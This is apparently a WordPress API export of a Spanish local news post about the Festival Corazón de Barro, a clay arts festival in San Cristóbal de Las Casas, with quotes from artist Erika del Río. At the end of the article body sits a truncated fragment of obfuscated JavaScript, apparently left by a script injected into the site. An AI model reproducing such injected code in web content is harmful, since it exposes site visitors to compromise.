{"id":13074,"date":"2023-12-06T02:17:35","date_gmt":"2023-12-06T02:17:35","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=13074"},"modified":"2023-12-06T02:17:35","modified_gmt":"2023-12-06T02:17:35","slug":"festival-corazon-de-barro-en-sclc","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=13074","title":{"rendered":"Festival Coraz\u00f3n de Barro en SCLC"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"771\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1701828891449-1024x771.jpg\" alt=\"\" class=\"wp-image-13075\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1701828891449-1024x771.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1701828891449-300x226.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1701828891449-768x578.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1701828891449.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>05 de Diciembre del 2023. San Crist\u00f3bal de Las Casas.- El Festival Coraz\u00f3n de Barro, se llevar\u00e1 a cabo los d\u00edas 8 y 9 de diciembre en La Ense\u00f1anza Casa de la Ciudad, d\u00f3nde la idea es reunir a colaboradores que trabajan en diferentes disciplinas utilizando las arcillas para sus manifestaciones creativas, por lo que habr\u00e1n diferentes actividades como talleres, conversatorios, m\u00fasica, gastronom\u00eda y temas como la bioconstrucci\u00f3n, la escultura en cer\u00e1mica, uso de las tierras, danza, Performance entre otros, inform\u00f3 la artista pl\u00e1stica Erika del R\u00edo.En entrevista, coment\u00f3 que se trata de un proyecto que surge de otro que realiz\u00f3 en Guanajuato y se llama Alfarero por un D\u00eda, &#8220;Coraz\u00f3n de Barro pues porque yo me dedico desde ese entonces al barro, entonces es como una apertura a una fiesta que tiene que ver con esta invitaci\u00f3n de conocer y conectar con la tierra y con el barro desde el coraz\u00f3n&#8221;.&#8221;La entrada es libre para todo el p\u00fablico de las 11 de la ma\u00f1ana a las 7 de la noche, el viernes dentro de la programaci\u00f3n que tenemos que est\u00e1 en redes sociales, se encuentra la exposici\u00f3n de mi trabajo que es una colaboraci\u00f3n que tengo con mujeres de comunidad que me han permitido entrar en sus vidas y he participado en la cocina en las tradiciones, en los oficios y todo lo v\u00ednculo y di\u00e1logo con el barro con fotograf\u00eda que muestra oficios y tradiciones, entonces los esperamos, esa exposici\u00f3n es a las 6 de la tarde y tambi\u00e9n es entrada libre el viernes 8 de diciembre&#8221;, agreg\u00f3.Finalmente, dijo que todas las piezas que crea se encuentran totalmente vinculadas hacia su sentir, hacia su experiencia y hacia una comuni\u00f3n con las mujeres, como un ser de mujer, &#8220;totalmente, todas est\u00e1n vinculadas conmigo&#8221;.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal 05 de Diciembre del 2023. San Crist\u00f3bal de Las Casas.- El Festival Coraz\u00f3n de Barro, se llevar\u00e1 a cabo los d\u00edas 8 y 9 de diciembre en La Ense\u00f1anza Casa de la Ciudad, d\u00f3nde la idea es reunir a colaboradores que trabajan en diferentes disciplinas utilizando las arcillas para sus manifestaciones creativas, por &hellip;<\/p>\n","protected":false},"author":2,"featured_media":13075,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-13074","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13074","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13074"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13074\/revisions"}],"predecessor-version":[{"id":13076,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13074\/revisions\/13076"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/13075"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13074"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13074"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13074"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}